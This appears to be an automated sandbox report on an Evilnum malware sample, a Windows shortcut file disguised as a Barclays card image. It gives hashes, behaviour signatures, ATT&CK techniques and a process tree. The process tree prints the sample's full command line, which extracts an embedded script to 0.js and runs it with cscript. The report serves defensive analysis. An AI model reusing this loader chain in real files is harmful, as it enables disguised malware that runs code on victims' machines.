Overview

overview

10

Static

static

24f7995ebb...4e.lnk

windows7_x64

10

24f7995ebb...4e.lnk

windows10-2004_x64

10

Analysis

  • max time kernel
    139s
  • max time network
    170s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    04-02-2022 08:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk

  • Size

    83KB

  • MD5

    85b2d96080c853c686f0b7b7284896a8

  • SHA1

    db50fc4ea4f6c13fdbcd28ebe2f1cc44a74a83bf

  • SHA256

    24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e

  • SHA512

    9d419fb9406456937e92d57fc1b21f62cac1838082f6059924630edbefb5b568348553658565d59796d97b6078b28827abdb8c3c6eddb36800d0c78dcceff791

Score
10/10
evilnumpersistencetrojan

Malware Config

Signatures

  • Evilnum

    A malware family with multiple components distributed through LNK files.

    trojanevilnum
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4296
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays CC Back.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\system32\forfiles.exe
        forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
        3⤵
          PID:4288
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
          3⤵
            PID:4880
          • C:\Windows\system32\find.exe
            find "RDE3"
            3⤵
              PID:4860
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" rd a"
              3⤵
                PID:4888
              • C:\Windows\system32\cscript.exe
                cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
                3⤵
                  PID:3332
            • C:\Windows\System32\WaaSMedicAgent.exe
              C:\Windows\System32\WaaSMedicAgent.exe 7fd05de6cbfdcb3ee5b35e7d0279084e 1fdQnVobK0qyVMPn6tDdsw.0.1.0.0.0
              1⤵
              • Modifies data under HKEY_USERS
              PID:3536
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
              1⤵
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:4328

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            Defense Evasion

            Modify Registry

            1
            T1112

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/4328-130-0x0000021E85D30000-0x0000021E85D40000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4328-131-0x0000021E85D90000-0x0000021E85DA0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/4328-132-0x0000021E88AB0000-0x0000021E88AB4000-memory.dmp
              Filesize

              16KB

              Download